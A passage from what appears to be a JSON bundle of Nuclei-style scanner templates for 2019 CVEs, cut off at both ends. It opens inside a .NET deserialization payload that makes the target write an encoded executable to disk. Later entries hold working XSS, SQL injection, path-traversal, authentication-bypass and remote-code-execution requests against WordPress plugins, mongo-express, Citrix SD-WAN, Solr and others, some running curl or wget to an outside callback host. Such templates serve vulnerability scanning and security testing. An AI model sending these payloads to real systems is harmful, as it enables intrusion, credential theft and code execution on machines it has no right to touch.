2%22%20xsi%3atype%3d%22xsd%3astring%22%3eAAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAALoXL2MgZWNobyBUVnFRQUFNQUFBQUVBQUFBLy84QUFMZ0FBQUFBQUFBQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQTZBQUFBQTRmdWc0QXRBbk5JYmdCVE0waFZHaHBjeUJ3Y205bmNtRnRJR05oYm01dmRDQmlaU0J5ZFc0Z2FXNGdSRTlUSUcxdlpHVXVEUTBLSkFBQUFBQUFBQUNUT1BEVzExbWVoZGRabm9YWFdaNkZyRVdTaGROWm5vVlVSWkNGM2xtZWhiaEdsSVhjV1o2RnVFYWFoZFJabm9YWFdaK0ZIbG1laFZSUnc0WGZXWjZGZzNxdWhmOVpub1VRWDVpRjFsbWVoVkpwWTJqWFdaNkZBQUFBQUFBQUFBQUFBQUFBQUFBQUFGQkZBQUJNQVFRQU81UnRTZ0FBQUFBQUFBQUE0QUFQQVFzQkJnQUFzQUFBQUtBQUFBQUFBQUNiaFFBQUFCQUFBQURBQUFBQUFFQUFBQkFBQUFBUUFBQUVBQUFBQUFBQUFBUUFBQUFBQUFBQUFHQUJBQUFRQUFBQUFBQUFBZ0FBQUFBQUVBQUFFQUFBQUFBUUFBQVFBQUFBQUFBQUVBQUFBQUFBQUFBQUFBQUFiTWNBQUhnQUFBQUFVQUVBeUFjQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU9EQkFBQWNBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBREFBQURnQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBTG5SbGVIUUFBQUJtcVFBQUFCQUFBQUN3QUFBQUVBQUFBQUFBQUFBQUFBQUFBQUFBSUFBQVlDNXlaR0YwWVFBQTVnOEFBQURBQUFBQUVBQUFBTUFBQUFBQUFBQUFBQUFBQUFBQUFFQUFBRUF1WkdGMFlRQUFBRnh3QUFBQTBBQUFBRUFBQUFEUUFBQUFBQUFBQUFBQUFBQUFBQUJBQUFEQUxuSnpjbU1BQUFESUJ3QUFBRkFCQUFBUUFBQUFFQUVBQUFBQUFBQUFBQUFBQUFBQVFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE%2bPiVURU1QJVxock9YVy5iNjQGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA%2bU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw%3d%3d%3c/System.Security.ClaimsIdentity.actor%3e%0a%20%20%20%20%3c/a1%3aWindowsIdentity%3e%0a%20%20%3c/SOAP-ENV%3aBody%3e%0a%3c/SOAP-ENV%3aEnvelope%3e","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["System.InvalidCastException","System.Web.Services.Protocols.SoapException"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2019-16931","info":{"name":"WordPress Visualizer <3.3.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-json/visualizer/v1/update-chart HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\": 7, \"visualizer-chart-type\": \"<script>alert(document.domain)</script>\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"success\":\"Chart updated\"}"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10692","info":{"name":"WordPress Google Maps <7.11.18 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"user_login\"","\"user_pass\"","\"user_nicename\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-19134","info":{"name":"WordPress Hero Maps Premium <=2.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["foo\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10758","info":{"name":"mongo-express Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /checkValid HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46cGFzcw==\nContent-Type: application/x-www-form-urlencoded\n\ndocument=this.constructor.constructor(\"return process\")().mainModule.require(\"child_process\").execSync(\"curl {{interactsh-url}}\")\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-16332","info":{"name":"WordPress API Bearer Auth <20190907 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20933","info":{"name":"InfluxDB <1.7.6 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/query?db=db&q=SHOW%20DATABASES"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"results\":","\"name\":\"databases\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18818","info":{"name":"strapi CMS <3.0.0-beta.17.5 - Admin Password Reset","severity":"critical"},"requests":[{"raw":["POST /admin/auth/reset-password HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/json\n\n{\"code\": {\"$gt\": 0}, \"password\": \"SuperStrongPassword1\", \"passwordConfirmation\": \"SuperStrongPassword1\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["\"username\":","\"email\":","\"jwt\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"json","json":[".user.username",".user.email"]}]}]},{"id":"CVE-2019-8442","info":{"name":"Jira - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/s/{{randstr}}/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml","{{BaseURL}}/s/{{randstr}}/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<groupId>com.atlassian.jira</groupId>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14974","info":{"name":"SugarCRM Enterprise 9.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms://"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["url = window.location.search.split(\"?desktop_url=\")[1]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9041","info":{"name":"ZZZCMS 1.6.1 - Remote Code Execution","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/search/"],"body":"keys={if:array_map(base_convert(27440799224,10,32),array(1))}{end if}\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["phpinfo","PHP Version"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7481","info":{"name":"SonicWall SRA 4600 VPN - SQL Injection","severity":"high"},"requests":[{"raw":["POST /cgi-bin/supportInstaller HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: identity\nUser-Agent: MSIE\nContent-Type: application/x-www-form-urlencoded\n\nfromEmailInvite=1&customerTID=unpossible'+UNION+SELECT+0,0,0,11132*379123,0,0,0,0--\n"],"matchers":[{"type":"word","part":"body","words":["4220397236"]}]}]},{"id":"CVE-2019-16996","info":{"name":"Metinfo 7.0.0 beta - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["1918835981"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12616","info":{"name":"phpMyAdmin <4.9.0 - Cross-Site Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/phpmyadmin/"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 4.9.0')"]},{"type":"word","words":["phpmyadmin.net","phpMyAdmin"],"condition":"or"},{"type":"status","status":[200,401]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\\?v=([0-9.]+)"],"internal":true},{"type":"regex","group":1,"regex":["\\?v=([0-9.]+)"]}]}]},{"id":"CVE-2019-14750","info":{"name":"osTicket < 1.12.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /upload/setup/install.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ns=install&name={{user_name}}&email={{user_email}}&lang_id=en_US&fname=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&lname=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&admin_email={{user_email}}&username={{user_name}}&passwd={{user_pass}}&passwd2={{user_pass}}&prefix=ost_&dbhost={{dbhost}}&dbname=tt&dbuser={{username}}&dbpass={{password}}&timezone=Asia%2FTokyo\n","GET /upload/scp/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /upload/scp/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__CSRFToken__={{csrftoken}}&do=scplogin&userid={{user_name}}&passwd={{user_pass}}&ajax=1\n","GET /upload/scp/settings.php HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_4","words":["<img src=x onerror=alert(1);>","getConfig().resolve"],"condition":"and"},{"type":"word","part":"header_4","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrftoken","part":"body","group":1,"regex":["__CSRFToken__\" value=\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2019-18922","info":{"name":"Allied Telesis AT-GS950/8 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12990","info":{"name":"Citrix SD-WAN Center - Local File Inclusion","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /Collector/appliancesettings/applianceSettingsFileTransfer HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfilename=../../../../../../home/talariuser/www/app/webroot/files/{{randstr}}&filedata=\n","GET /talari/app/files/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers":[{"type":"dsl","dsl":["contains(header, \"text/html\")","status_code_3 == 200","contains(body_1, \"<title>Citrix SD-WAN</title>\")"],"condition":"and"}]}]},{"id":"CVE-2019-9733","info":{"name":"JFrog Artifactory 6.7.3 - Admin Login Bypass","severity":"critical"},"requests":[{"raw":["POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nX-Requested-With: artUI\nX-Forwarded-For: 127.0.0.1\nRequest-Agent: artifactoryUI\nContent-Type: application/json\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/artifactory/webapp/\n\n{\"user\":\"access-admin\",\"password\":\"password\",\"type\":\"login\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\": \"access-admin\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16932","info":{"name":"Visualizer <3.3.1 - Blind Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-json/visualizer/v1/upload-data"],"body":"{\\\"url\\\":\\\"http://{{interactsh-url}}\\\"}","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","name":"http","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-5127","info":{"name":"YouPHPTube Encoder 2.3 - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/objects/getImage.php?base64Url={{base64(encode)}}=&format=png","{{BaseURL}}/objects/getImageMP4.php?base64Url={{base64(encode)}}=&format=jpg","{{BaseURL}}/objects/getSpiritsFromVideo.php?base64Url={{base64(encode)}}=&format=jpg"],"headers":{"Content-Type":"application/x-www-form-urlencoded"}},{"method":"GET","path":["{{BaseURL}}/objects/{{filename}}.txt"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11248","info":{"name":"Debug Endpoint pprof - Exposure Detection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/debug/pprof/","{{BaseURL}}/debug/pprof/goroutine?debug=1"],"stop-at-first-match":true,"matchers":[{"type":"word","words":["Types of profiles available:","Profile Descriptions","goroutine profile: total"],"condition":"or"}]}]},{"id":"CVE-2019-17662","info":{"name":"ThinVNC 1.0b1 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /{{randstr}}/../../ThinVnc.ini HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["User=","Password="],"condition":"and"},{"type":"word","part":"header","words":["application/binary"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20141","info":{"name":"WordPress Laborator Neon Theme 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/data/autosuggest-remote.php?q=\"><img%20src=x%20onerror=alert(1)>","{{BaseURL}}/admin/data/autosuggest-remote.php?q=\"><img%20src=x%20onerror=alert(1)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><img src=x onerror=alert(1)>>)1(trela=rorreno"]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2019-12593","info":{"name":"IceWarp Mail Server <=10.4.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini","{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd"],"matchers-condition":"and","matchers":[{"type":"word","words":["[intl]","root:x:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11869","info":{"name":"WordPress Yuzo <5.12.94 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/options-general.php?page=yuzo-related-post HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nyuzo_related_post_css_and_style=</style><script>alert(0);</script>\n","GET / HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_2, \"<script>alert(0);</script>\")"]},{"type":"dsl","dsl":["contains(tolower(header_2), 'text/html')"]}]}]},{"id":"CVE-2019-17538","info":{"name":"Jiangnan Online Judge 0.8.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14312","info":{"name":"Aptana Jaxer 1.0.3.4547 - Local File inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-6802","info":{"name":"Pypiserver <1.2.5 - Carriage Return Line Feed Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%0d%0aSet-Cookie:crlfinjection=1;"],"matchers":[{"type":"word","part":"header","words":["Set-Cookie: crlfinjection=1;"]}]}]},{"id":"CVE-2019-12988","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","GET /Collector/nms/addModifyZTDProxy?ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(/bin/wget$IFShttp://{{interactsh-url}}) HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<title>Citrix SD-WAN</title>\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-17558","info":{"name":"Apache Solr <=8.3.1 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\n","POST /solr/{{core}}/config HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n    \"update-queryresponsewriter\": {\n      \"startup\": \"lazy\",\n      \"name\": \"velocity\",\n      \"class\": \"solr.VelocityResponseWriter\",\n      \"template.base.dir\": \"\",\n      \"solr.resource.loader.enabled\": \"true\",\n      \"params.resource.loader.enabled\": \"true\"\n    }\n}\n","GET 